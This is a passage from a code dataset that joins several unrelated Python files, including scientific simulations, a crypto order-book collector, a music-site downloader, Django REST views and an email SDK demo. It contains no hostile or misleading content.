Concatenate the original feature vector with the predicition probabilities\n of a cascade layer.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param prf_crf_pred: list\n Prediction probabilities by a cascade layer for X.\n\n :return: np.array\n Concatenation of X and the predicted probabilities.\n To be used for the next layer in a cascade forest.\n \"\"\"\n swap_pred = np.swapaxes(prf_crf_pred, 0, 1)\n add_feat = swap_pred.reshape([np.shape(X)[0], -1])\n feat_arr = np.concatenate([add_feat, X], axis=1)\n\n return feat_arr\n","sub_path":"gcForestClassifier.py","file_name":"gcForestClassifier.py","file_ext":"py","file_size_in_byte":22403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"468683988","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 11 13:22:59 2016\n\nCellular Automata: More Complicated Tea Leaf Dispersion (oriented, hexagonal)\nUsing CellLab\n\n@author: Katherine\n\"\"\"\n\nimport time\nimport matplotlib\nfrom numpy import where\nfrom landlab import HexModelGrid\nfrom landlab.ca.celllab_cts import Transition, CAPlotter\nfrom landlab.ca.oriented_hex_cts import OrientedHexCTS\n\ndef setup_transition_list():\n \"\"\"\n Creates and returns a list of Transition() objects to represent state\n transitions for an unbiased random walk.\n\n Parameters\n ----------\n (none)\n\n Returns\n -------\n xn_list : list of Transition 
objects\n List of objects that encode information about the link-state transitions.\n\n Notes\n -----\n State 0 represents fluid and state 1 represents a particle (such as a\n sediment grain, tea leaf, or solute molecule).\n\n The states and transitions are as follows:\n\n Pair state (orientation) Transition to Process Rate (cells/s)\n ======================== ============= ======= ==============\n 0 (0-0) (none) - -\n 1 (0-1) (0) 2 (1-0) (0) down motion 10.0\n 2 (1-0) (0) 1 (0-1) (0) up motion 5.0\n 3 (0-1) (1) 4 (1-0) (1) leftward down motion 10.0\n 4 (1-0) (1) 3 (0-1) (1) rightward up motion 5.0\n 5 (0-1) (2) 6 (1-0) (2) leftward up motion 5.0\n 6 (1-0) (2) 5 (0-1) (2) rightward down motion 10.0\n 7 (1-1) (none) - -\n\n \"\"\"\n\n # Create an empty transition list\n xn_list = []\n\n # Append the six transitions to the list.\n # Note that the arguments to the Transition() object constructor are:\n # - Tuple representing starting pair state\n # (left/bottom cell, right/top cell, orientation)\n # - Tuple representing new pair state\n # (left/bottom cell, right/top cell, orientation)\n # - Transition rate (cells per time step, in this case 1 sec)\n # - Name for transition\n xn_list.append( Transition((0,1,0), (1,0,0), 10., 'down motion') )\n xn_list.append( Transition((1,0,0), (0,1,0), 5., 'up motion') )\n xn_list.append( Transition((0,1,1), (1,0,1), 10., 'leftward down motion'))\n xn_list.append( Transition((1,0,1), (0,1,1), 5., 'rightward up motion'))\n xn_list.append( Transition((0,1,2), (1,0,2), 5., 'leftward up motion'))\n xn_list.append( Transition((1,0,2), (0,1,2), 10., 'rightward down motion')) \n return xn_list\n \n \ndef main():\n # INITIALIZE\n # User-defined parameters\n nr = 80 # number of rows in grid\n nc = 50 # number of columns in grid\n plot_interval = 0.5 # time interval for plotting, sec\n run_duration = 20.0 # duration of run, sec\n report_interval = 10.0 # report interval, in real-time seconds\n\n # Remember the clock time, and calculate when we next want to report\n # progress.\n current_real_time = time.time()\n next_report = current_real_time + report_interval\n\n # Create grid\n mg = HexModelGrid(nr, nc, 1.0)\n\n # Make the boundaries be walls\n# mg.set_closed_boundaries_at_grid_edges(True, True, True, True)<--I am not sure what the equivalent is for hexgrid\n\n #Create a node-state dictionary\n ns_dict = { 0 : 'fluid', 1 : 'particle' }\n\n #Create the transition list\n xn_list = setup_transition_list()\n\n # Create the node-state array and attach it to the grid\n node_state_grid = mg.add_zeros('node', 'node_state_map', dtype=int)\n\n # Initialize the node-state array: here, the initial condition is a pile of\n # resting grains at the bottom of a container.\n bottom_rows = where(mg.node_y<0.1*nr)[0]\n node_state_grid[bottom_rows] = 1\n\n # For visual display purposes, set all boundary nodes to fluid\n node_state_grid[mg.closed_boundary_nodes] = 0\n\n # Create the CA model\n ca = OrientedHexCTS(mg, ns_dict, xn_list, node_state_grid)\n\n # Set up colors for plotting\n grain = '#5F594D'\n fluid = '#D0E4F2'\n clist = [fluid,grain]\n my_cmap = matplotlib.colors.ListedColormap(clist)\n\n # Create a CAPlotter object for handling screen display\n ca_plotter = CAPlotter(ca, cmap=my_cmap)\n\n # Plot the initial grid\n ca_plotter.update_plot()\n\n # RUN\n current_time = 0.0\n while current_time < run_duration:\n\n # Once in a while, print out simulation real time to let the user\n # know that the sim is running ok\n current_real_time = time.time()\n if current_real_time >= 
next_report:\n print('Current simulation time '+str(current_time)+' \\\n ('+str(int(100*current_time/run_duration))+'%)')\n next_report = current_real_time + report_interval\n\n # Run the model forward in time until the next output step\n ca.run(current_time+plot_interval, ca.node_state, plot_each_transition=False)\n current_time += plot_interval\n\n # Plot the current grid\n ca_plotter.update_plot()\n \n ca_plotter.finalize()\n\n\nmain()","sub_path":"Git_Add_Scripts/TeaLeaf_Dispersion_Gravity_Hex.py","file_name":"TeaLeaf_Dispersion_Gravity_Hex.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14424401","text":"#!/usr/local/bin/python2.7\nfrom argparse import ArgumentParser\nfrom sys import exit, stderr, stdout, path\nfrom os import system\nfrom python_util import print_args\n\nfrom ScoreTable import *\nfrom ScoreFunction import *\nfrom Pose import *\nfrom FragIdxPose import *\nfrom TrajectoryTracker import *\n\n \n\nif __name__=='__main__':\n parser = ArgumentParser()\n parser.add_argument(\"-p\", \"--selected_frags_path\", required=True, help=\"\")\n\n parser.add_argument(\"-d\", \"--density_scorefile\", help=\"\")\n parser.add_argument(\"-o\", \"--overlap_scorefile\", help=\"\")\n parser.add_argument(\"-n\", \"--nonoverlap_scorefile\", help=\"\")\n\n parser.add_argument(\"-dw\", \"--density_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-ow\", \"--overlap_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-cw\", \"--closab_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-sw\", \"--clash_score_wt\", default=100.0, type=float, help=\"default=100.0\")\n\n parser.add_argument(\"-e\", \"--null_frag_score\", default=-200.0, type=float, help=\"default=-200\")\n\n parser.add_argument(\"--nstruct\", default=1, type=int, help=\"default=1\")\n args = parser.parse_args()\n wts_used = print_args( args ) \n out = open(\"lowrmsd.decomposed.log\", \"w\")\n out.write( wts_used )\n out.close()\n\n # score table\n scoretable = ScoreTable( args.selected_frags_path )\n scoretable.score_files_reader( args.density_scorefile, args.overlap_scorefile, args.nonoverlap_scorefile )\n\n # scorefxn\n wts = Weights( args.density_score_wt, args.overlap_score_wt, args.closab_score_wt, args.clash_score_wt )\n scorefxn = ScoreFunction( scoretable, wts, args.null_frag_score )\n\n # initialize with lowrmsd frags\n fragidx_pose = FragIdxPose() # doesn't have any method in it.\n fragidx_pose.initialization( scorefxn.get_density_score_dict(), \"lowrmsd\" ) # default initialize by random\n\n # store the lowrmsd_frags pose into scorefxn\n scorefxn.update_pose( fragidx_pose ) \n\n residual_pose = scorefxn.residualize_pose() # residual_pose will be filled with Residue objects, which contains decomposed scores for each residue\n\n # dump pose\n tracker = TrajectoryTracker()\n tracker.save( 1, residual_pose ) # 1 is a arbitrary number\n tracker.dump_pickle( \"lowrmsd\" )\n\n residual_pose.show_state( \"lowrmsd\", True ) # True for verbose showing all residues states\n system(\"/work/wangyr/scripts/cryoem_util/decompose_score_terms.py lowrmsd.pickle >> lowrmsd.decomposed.log\")\n \n \n","sub_path":"denovo_utils/lowest_rmsd_pose.py","file_name":"lowest_rmsd_pose.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"527292383","text":"from 
serial_monitor import serial_monitor\nfrom current_time import current_time\nfrom filecontrol import filecontrol\nfrom database import database\nimport serial\nimport time\nimport mysql.connector\nimport os\n\ncount = 0\nuserid = str(1)\nactive = True\n\ntime.sleep(2)\n\ncurrent_time = current_time()\nhour = current_time.get_hour()\n\nsm = serial_monitor()\n\nfilecontrol = filecontrol()\n\ndb = database()\ndb.connect()\n\n# Read and record the data\nwhile active:\n sm.read(True)\n distance = str(sm.get_distance())\n ldr = str(sm.get_ldr())\n valid = int(sm.get_valid())\n\n if int(distance) != 0 and int(distance) < 20 and valid == 1:\n sm.read(False)\n print(\"CAPTURE\")\n os.system('python capture.py')\n sm.read(True)\n \n count += 1\n time.sleep(0.1) # wait (sleep) 0.1 seconds\n \n if count % 2 == 0 and count != 0:\n col_headers = ['sensor_values', 'distance', 'ldr', 'userid']\n col_values = [distance, ldr, userid]\n\n db.insert(col_headers, col_values)\n\n current_hour = current_time.get_hour()\n\n if current_hour > hour: #previous current_hour > hour\n filecontrol.file_check()\n hour = current_hour","sub_path":"hardware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219431023","text":"import time\nimport boto3\nimport json\nimport ast\nfrom binance.client import Client\n\n# Instantiate resources\ntry:\n boto_session = boto3.Session(profile_name='loidsig')\nexcept:\n boto_session = boto3.Session()\ns3_resource = boto_session.resource('s3')\ns3_bucket = 'loidsig-crypto'\n\nsm_client = boto_session.client(\n service_name='secretsmanager',\n region_name='us-east-1',\n endpoint_url='https://secretsmanager.us-east-1.amazonaws.com'\n)\nget_secret_value_response = sm_client.get_secret_value(SecretId='Loidsig_CPM_Binance')\nkey, value = ast.literal_eval(get_secret_value_response['SecretString']).popitem()\nbnb = Client(key, value)\n\ndef main(event, context):\n time.sleep(2) # eth seems to be collected too early. \n coins = (\n 'ETHUSDT',\n 'BTCUSDT',\n 'ETHBTC',\n 'BNBUSDT',\n 'LTCUSDT',\n 'BCHABCUSDT',\n 'NEOUSDT',\n 'ETCUSDT',\n 'EOSUSDT',\n 'TRXUSDT',\n 'QTUMUSDT',\n 'XRPUSDT',\n 'TRXETH',\n 'XRPETH',\n 'NEOETH',\n 'TUSDBNB',\n 'TUSDBTC',\n 'TUSDETH'\n )\n for coin_pair in coins:\n json_message, unix_timestamp = get_orderbook_message(coin_pair)\n message_to_s3(json_message, coin_pair, unix_timestamp)\n message_to_queue(json_message)\n\ndef get_orderbook_message(coin_pair):\n unix_timestamp = int(time.time())\n api_tries = 0\n while api_tries < 2:\n try:\n order_book = bnb.get_order_book(symbol=coin_pair, limit=1000)\n break\n except Exception as e:\n print(f\"Error! 
{e}\")\n api_tries += 1\n time.sleep(5)\n # Bids\n orderbook_bids = order_book['bids']\n # Asks\n orderbook_asks = order_book['asks']\n # Build message\n message = {}\n message['exchange'] = 'binance'\n message['coin_pair'] = coin_pair.lower().replace('-', '')\n message['unix_timestamp'] = unix_timestamp\n message['bids'] = orderbook_bids\n message['asks'] = orderbook_asks\n message_json = json.dumps(message)\n return message_json, unix_timestamp\n\ndef message_to_s3(json, coin_pair, timestamp):\n file_name = f\"{timestamp}.json\"\n file_path = f\"binance/historic_orderbook_raw/{coin_pair}/{file_name}\"\n s3_resource.Object(s3_bucket, file_path).put(Body=json)\n\ndef message_to_queue(message):\n # Send message\n sqs_resource = boto_session.resource('sqs', region_name='us-east-1')\n sqs_queue = sqs_resource.get_queue_by_name(QueueName='raw_orderbook_events')\n response = sqs_queue.send_message(MessageBody=message)\n print(response.get('MessageId'))\n print(response.get('MD5OfMessageBody'))\n\nif __name__ == '__main__':\n main(None, None)","sub_path":"src/data_pipeline/orderbook/orderbook_events_service/binance_orderbook_events.py","file_name":"binance_orderbook_events.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"453357029","text":"import cv2\nimport os\n\nfs = os.listdir('/home/nagalab/soutarou/images')\nfor fn in fs:\n img = cv2.imread('/home/nagalab/soutarou/images/' + fn)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n cascade = cv2.CascadeClassifier(\"lbpcascade_animeface.xml\")\n face_list = cascade.detectMultiScale(gray, 1.1,minSize=(150,150))\n if len(face_list) > 0:\n for x,y,w,h in face_list:\n face_cut = img[y:y+h, x:x+w]\n cv2.imwrite('/home/nagalab/soutarou/face/' + fn,face_cut)\n\n","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"616077168","text":"import requests\r\nimport json\r\nimport os\r\n\r\nclass KuWo(object):\r\n\r\n def __init__(self):\r\n\r\n self.headers = {\r\n \"Cookie\": \"Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1613969685; _ga=GA1.2.373368830.1613969685; _gid=GA1.2.1071113528.1613969685; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1613970806; kw_token=21O69LPAXV8\",\r\n \"csrf\": \"21O69LPAXV8\",\r\n \"Host\": \"www.kuwo.cn\",\r\n \"Referer\": \"http://www.kuwo.cn\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\"\r\n }\r\n\r\n def get_url(self,pn=1,rn=1):\r\n keyword = input(\"请输入需要下载的歌曲:\")\r\n return \"http://www.kuwo.cn/api/www/search/searchMusicBykeyWord?key=%s&pn=%s&rn=%s\" %(keyword,pn,rn)\r\n\r\n def parse_url(self,url):\r\n request = requests.get(url,headers=self.headers).text\r\n return request\r\n\r\n def get_song_url(self,request):\r\n result = json.loads(request)[\"data\"][\"list\"][0]\r\n song_name = result[\"name\"]\r\n rid = result[\"rid\"]\r\n\r\n purl = \"http://www.kuwo.cn/url?rid=%s&type=convert_url3&br=128kmp3\" %(rid,)\r\n song_url = json.loads(self.parse_url(purl))[\"url\"]\r\n return song_name,song_url\r\n\r\n def download(self,song_name,song_url):\r\n if not os.path.exists('music'):\r\n os.mkdir('music')\r\n with open('music/%s.mp3' %(song_name,),'wb') as f:\r\n music_mp3 = requests.get(song_url,timeout = 5).content\r\n f.write(music_mp3)\r\n print(\"success\")\r\n\r\n def run(self):\r\n #1 
Prepare the url address\r\n url = self.get_url()\r\n #2 Send the request and get the response\r\n res = self.parse_url(url)\r\n #3 Get the url address of the single song\r\n #4 Send the request, get the response, and parse out the song file address\r\n song_name,song_url = self.get_song_url(res)\r\n #5 Save as an MP3 file\r\n self.download(song_name,song_url)\r\n \r\nif __name__ == '__main__':\r\n kw = KuWo()\r\n kw.run()","sub_path":"KuWo_music.py","file_name":"KuWo_music.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"306481620","text":"import fibonacci\nimport time\n\ndef summ():\n\n t1 = time.time()\n sum = 0\n for i in range(100000):\n sum += fibonacci.cycle(i)\n print(sum)\n print(len(str(sum)))\n print(time.time() - t1)\n\nsumm()","sub_path":"summOf.py","file_name":"summOf.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93449227","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import exceptions, generics, permissions\n\nfrom .models import Invitation, LicenceAcceptance, LicenceVersion, Team, TeamMember\nfrom .permissions import (\n IsTeamAdminForUnsafePermission,\n IsTeamMemberPermission,\n)\nfrom .serializers import (\n InvitationSerializer,\n LicenceAcceptanceSerializer,\n TeamSerializer,\n TeamMemberSerializer,\n UserSerializer,\n)\nfrom .helpers import get_teams_for_user\n\nUser = get_user_model()\n\n\nclass TeamDetailView(generics.RetrieveUpdateAPIView):\n \"\"\"\n API detail endpoint for Team.\n \"\"\"\n\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n serializer_class = TeamSerializer\n lookup_url_kwarg = (\n \"team_id\" # using team_id keeps view compatible with team permission classes\n )\n\n def get_queryset(self):\n return get_teams_for_user(self.request.user)\n\n\nclass TeamMemberListView(generics.ListAPIView):\n \"\"\"\n API list endpoint for TeamMember.\n \"\"\"\n\n serializer_class = TeamMemberSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return TeamMember.objects.filter(team__in=teams)\n\n\nclass TeamMemberDetailView(generics.RetrieveDestroyAPIView):\n \"\"\"\n API detail endpoint for TeamMember.\n \"\"\"\n\n serializer_class = TeamMemberSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n teams = get_teams_for_user(self.request.user)\n return TeamMember.objects.filter(team__in=teams)\n\n def delete(self, request, team_id, pk):\n if get_object_or_404(TeamMember, pk=pk).user == request.user:\n # Don't allow a team member to delete themselves\n raise exceptions.MethodNotAllowed(\"Own team membership cannot be deleted.\")\n return super().delete(self, request, team_id, pk)\n\n\nclass InvitationListView(generics.ListCreateAPIView):\n \"\"\"\n API list endpoint for Invitation.\n \"\"\"\n\n serializer_class = InvitationSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return Invitation.objects.filter(to_team__in=teams, 
accepted=False)\n\n def perform_create(self, serializer):\n \"\"\"\n Set to_team from url resolver\n Send email after creation\n \"\"\"\n team = get_object_or_404(Team, pk=self.request.resolver_match.kwargs[\"team_id\"])\n invitation = serializer.save(to_team=team)\n invitation.send_invitation_email()\n\n\nclass InvitationDetailView(generics.RetrieveDestroyAPIView):\n \"\"\"\n API detail endpoint for Invitation.\n \"\"\"\n\n serializer_class = InvitationSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n queryset = Invitation.objects.all()\n\n def get_object(self):\n obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n self.check_object_permissions(self.request, obj)\n if self.request.method == \"DELETE\" and obj.accepted:\n # Don't allow accepted invitations to be deleted\n raise exceptions.MethodNotAllowed(\"Accepted invitations cannot be deleted.\")\n return obj\n\n\nclass OwnUserDetailView(generics.RetrieveUpdateAPIView):\n \"\"\"\n API detail endpoint for authenticated/own User.\n \"\"\"\n\n serializer_class = UserSerializer\n queryset = User.objects.all()\n\n def get_object(self):\n return self.request.user\n\n\nclass LicenceAcceptanceListView(generics.ListCreateAPIView):\n \"\"\"\n API detail endpoint for LicenceAcceptance.\n \"\"\"\n\n serializer_class = LicenceAcceptanceSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return LicenceAcceptance.objects.filter(team__in=teams)\n\n def perform_create(self, serializer):\n \"\"\"\n Set team from url resolver, user from request\n Send email after creation\n \"\"\"\n team = get_object_or_404(Team, pk=self.request.resolver_match.kwargs[\"team_id\"])\n try:\n licence_version = LicenceVersion.objects.current()\n except LicenceVersion.DoesNotExist:\n raise exceptions.APIException(\n code=500, detail=\"No current Licence version exists.\"\n )\n\n serializer.save(\n licence_version=licence_version, team=team, user=self.request.user\n )\n","sub_path":"brynweb/userdb/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"256820587","text":"import tensorflow as tf\nfrom SRNTT.tensorlayer import *\nimport numpy as np\nfrom glob import glob\nfrom os.path import exists, join, split, realpath, dirname\nfrom os import makedirs\nfrom SRNTT.model import *\nfrom SRNTT.vgg19 import *\nfrom SRNTT.swap360 import *\nfrom scipy.misc import imread, imresize\nimport argparse\nimport csv\n\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nparser = argparse.ArgumentParser('offline_patchMatch_textureSwap')\nparser.add_argument('--data_folder', type=str, default='data/train/CUFED', help='The dir of dataset: CUFED or DIV2K')\nargs = parser.parse_args()\n\ndata_folder = '/media/zy/55d6108f-5507-4552-977b-a5fbda209f8d/DocuClassLin/lsy/contextualLoss-master/move/new_2k/'\ninput_size_w = 240\ninput_size_h = 120\ninput_path = data_folder\n# 是否要去掉2_1?在比较特征时,是否需要先下采样再上采样?\n# matching_layer = ['relu3_1', 'relu2_1', 'relu1_1']\nmatching_layer = ['relu3_1', 'relu1_1']\ninput_files = sorted(glob(join(input_path, '*.jpg')))\nn_files = len(input_files)\nprint('长度:', n_files)\n\nvgg19_model_path = 
'SRNTT/models/VGG19/imagenet-vgg-verydeep-19.mat'\ntf_input = tf.placeholder(dtype=tf.float32, shape=[1, input_size_h, input_size_w, 3])\nsrntt = SRNTT(vgg19_model_path=vgg19_model_path)\nnet_upscale, _ = srntt.model(tf_input / 127.5 - 1, is_train=False)\nnet_vgg19 = VGG19(model_path=vgg19_model_path)\nswaper = Swap()\n\n\ndef write_corr_list(row):\n    path = \"corr_list_normalize.csv\"\n    with open(path, 'a+') as f:\n        csv_write = csv.writer(f)\n        csv_write.writerow(row)\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n    tf.global_variables_initializer().run()\n    model_path = join(dirname(realpath(__file__)), 'SRNTT', 'models', 'SRNTT', 'upscale.npz')\n    if files.load_and_assign_npz(\n            sess=sess,\n            name=model_path,\n            network=net_upscale) is False:\n        raise Exception('FAILED load %s' % model_path)\n    else:\n        print('SUCCESS load %s' % model_path)\n    print_format = '%%0%dd/%%0%dd' % (len(str(n_files)), len(str(n_files)))\n    corr_list = []\n    csv_data_name = []\n    i = 0\n    # for i in range(n_files):\n    with open('label_cut_full_wspsnr.csv', 'r') as csv_file:\n        reader = csv.reader(csv_file)\n        for row in reader:\n            csv_data_name.append(row[0])\n    print(\"number of csv entries\", len(csv_data_name))\n    for item in csv_data_name:\n        print(print_format % (i + 1, n_files))\n        corr_list.append(item)\n        img_path = os.path.join(data_folder, item)\n        full_image = imread(img_path, mode='RGB')\n        height = full_image.shape[0]\n        width = full_image.shape[1]\n        lr_top = np.concatenate((full_image[0:int(height / 4), 0:int(width / 2), :],\n                                 full_image[0:int(height / 4), int(width / 2):width, :]), axis=0)\n        lr_bottom = np.concatenate((full_image[int(3 * height / 4):height, 0:int(width / 2), :],\n                                    full_image[int(3 * height / 4):height, int(width / 2):width, :]), axis=0)\n        for cut_line in range(0, width, int(width / 10)):\n            print(\"current cut line:\", cut_line)\n            img_left = full_image[:, 0:cut_line, :]\n            img_right = full_image[:, cut_line:width, :]\n            full_image_after_move = np.concatenate((img_right, img_left), axis=1)\n            # all four of these are 480*960\n            lr_center = full_image_after_move[int(height / 4):int(3 * height / 4), 0:int(width / 2), :]\n            # lr_top = np.concatenate((full_image[0:int(height / 4), 0:int(width / 2), :],\n            #                          full_image[0:int(height / 4), int(width / 2):width, :]), axis=0)\n            # lr_bottom = np.concatenate((full_image[int(3 * height / 4):height, 0:int(width / 2), :],\n            #                             full_image[int(3 * height / 4):height, int(width / 2):width, :]), axis=0)\n            ref = full_image_after_move[int(height / 4):int(3 * height / 4), int(width / 2):width, :]\n            # imsave('center_%02d.png' % cut_line, lr_center)\n            # imsave('top_%02d.png' % cut_line, lr_top)\n            # imsave('bottom_%02d.png' % cut_line, lr_bottom)\n            # imsave('ref_%02d.png' % cut_line, ref)\n\n            # low-resolution inputs\n            img_in_lr_center = imresize(lr_center, (input_size_h, input_size_w), interp='bicubic')\n            img_in_lr_top = imresize(lr_top, (input_size_h, input_size_w), interp='bicubic')\n            img_in_lr_bottom = imresize(lr_bottom, (input_size_h, input_size_w), interp='bicubic')\n            # ref at its original size and downscaled by a factor of four\n            img_ref = imresize(ref, (input_size_h * 4, input_size_w * 4), interp='bicubic')\n            img_ref_lr = imresize(img_ref, (input_size_h, input_size_w), interp='bicubic')\n            # LR/ref upscaled by the network (four times in both width and height)\n            img_in_center_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_center]})[0] + 1) * 127.5\n            img_in_top_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_top]})[0] + 1) * 127.5\n            img_in_bottom_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_bottom]})[0] + 1) * 127.5\n            img_ref_sr = 
(net_upscale.outputs.eval({tf_input: [img_ref_lr]})[0] + 1) * 127.5\n\n            # get feature maps via VGG19\n            # [1,40,40,256] [3,40,40,256] [1,40,40,256]\n            # possible values of matching_layer: ['relu3_1', 'relu2_1', 'relu1_1']\n            # map_ref[0] [1,40,40,256] ; map_ref[1] [1,80,80,128] ; map_ref[2] [1,160,160,64]\n            map_in_center_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_center_sr,\n                                                          layer_name=matching_layer)\n            map_in_top_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_top_sr,\n                                                       layer_name=matching_layer)\n            map_in_bottom_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_bottom_sr,\n                                                          layer_name=matching_layer)\n\n            map_ref = net_vgg19.get_layer_output(sess=sess, feed_image=img_ref, layer_name=matching_layer[0])\n            map_ref_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_ref_sr, layer_name=matching_layer)\n\n            # patch matching and swapping\n            # [2,80,80,128]\n            # other_style = []\n            # for m in map_ref[1:]:\n            #     other_style.append([m])\n\n            other_condition = []\n            for s in map_ref_sr[1:]:\n                other_condition.append([s])\n\n            other_center = []\n            for n in map_in_center_sr[1:]:\n                other_center.append([n])\n\n            other_top = []\n            for e in map_in_top_sr[1:]:\n                other_top.append([e])\n\n            other_bottom = []\n            for r in map_in_bottom_sr[1:]:\n                other_bottom.append([r])\n\n            # print(\"shape of map_in_sr\", len(map_in_sr))\n            # print(\"shape of map_ref\", len(map_ref))\n            # print(\"shape of map_ref[0]\", len(map_ref[0]))\n            # print(\"shape of map_ref_sr\", len(map_ref_sr))\n            # print(\"shape of other_style\", len(other_style))\n            # print(\"shape of lr_center\", lr_center.shape)\n            # print(\"shape of lr_top\", lr_top.shape)\n            # print(\"shape of lr_bottom\", lr_bottom.shape)\n            # print(\"shape of ref\", ref.shape)\n            # print(\"shape of map_in_sr\", map_in_sr.shape)\n            # print(\"shape of map_ref[0]\", np.array(map_ref[0]).shape)\n            # print(\"shape of map_ref[1]\", np.array(map_ref[1]).shape)\n            # print(\"shape of map_ref[2]\", np.array(map_ref[2]).shape)\n            # print(\"shape of map_in_center_sr[0]\", np.array(map_in_center_sr[0]).shape)\n            # print(\"shape of map_in_center_sr[1]\", np.array(map_in_center_sr[1]).shape)\n            # print(\"shape of map_in_center_sr[2]\", np.array(map_in_center_sr[2]).shape)\n            # print(\"shape of map_in_top_sr[0]\", np.array(map_in_top_sr[0]).shape)\n            # print(\"shape of map_in_top_sr[1]\", np.array(map_in_top_sr[1]).shape)\n            # print(\"shape of map_in_top_sr[2]\", np.array(map_in_top_sr[2]).shape)\n            # print(\"shape of map_ref\", np.array(map_ref).shape)\n            # print(\"shape of map_ref_sr[0]\", np.array(map_ref_sr[0]).shape)\n            # print(\"shape of map_ref_sr[1]\", np.array(map_ref_sr[1]).shape)\n            # print(\"shape of map_ref_sr[2]\", np.array(map_ref_sr[2]).shape)\n            # print(\"shape of other_condition\", len(other_condition))\n            # print(\"shape of other_center\", len(other_center))\n            # print(\"shape of other_top\", len(other_top))\n            # print(\"shape of other_bottom\", len(other_bottom))\n\n\n            corr = swaper.conditional_swap_multi_layer(\n                content=[map_in_center_sr[0], map_in_top_sr[0], map_in_bottom_sr[0]],\n                style=[map_ref],\n                condition=[map_ref_sr[0]],\n                other_conditions=other_condition,\n                other_centers=other_center,\n                other_tops=other_top,\n                other_bottoms=other_bottom\n            )\n            print(\"total correlation of relu3_1 and relu1_1\",corr)\n            corr_list.append(corr)\n        i = i + 1\n        write_corr_list(corr_list)\n        corr_list = []\n\n        # save maps\n        # np.savez(file_name, target_map=maps, weights=weights, 
correspondence=correspondence)\n","sub_path":"offline_swap_for360.py","file_name":"offline_swap_for360.py","file_ext":"py","file_size_in_byte":9501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"338148093","text":"'''\nSubmail mail/xsend API demo\nSUBMAIL SDK Version 1.0.1 --python\ncopyright 2011 - 2014 SUBMAIL\n'''\nfrom .mail_xsend import MAILXsend\nfrom .app_configs import MAIL_CONFIGS\n\n'''\ninit MESSAGEXsend class\n'''\nsubmail = MAILXsend(MAIL_CONFIGS)\n\n'''\nOptional para\nThe First para: recipient email address\nThe second para: recipient name(optional)\n@Multi-para\n'''\nsubmail.add_to('leo@submail.cn','leo')\n\n'''\nOptional para\nset addressbook sign : Optional\nadd addressbook contacts to Multi-Recipients\n@Multi-para\n'''\n#submail.add_address_book('subscribe')\n\n'''\nOptional para\nset sender address and name\nThe First para: sender email address\nThe second para: sender display name (optional)\n'''\n#submail.set_sender('no-reply@submail.cn','SUBMAIL')\n\n'''\nOptional para\nset reply address\n'''\n#submail.set_reply('service@submail.cn')\n\n'''\nOptional para\nset email subject\n'''\n#submail.set_subject('test 